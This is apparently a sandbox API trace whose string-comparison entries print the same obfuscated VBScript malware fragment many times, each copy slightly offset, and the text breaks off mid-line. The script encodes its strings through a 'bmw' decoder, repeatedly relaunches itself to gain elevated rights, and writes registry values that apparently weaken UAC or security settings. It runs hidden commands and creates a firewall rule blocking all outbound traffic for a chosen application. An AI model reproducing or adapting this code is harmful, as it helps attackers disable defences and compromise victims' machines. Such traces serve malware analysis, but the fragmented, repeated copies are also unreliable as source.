(fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0223.004] wcsncmp (_String1="me, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.004] wcsncmp (_String1="e, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.004] wcsncmp (_String1=", str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0223.004] wcsncmp (_String1=" str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.004] wcsncmp (_String1="str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 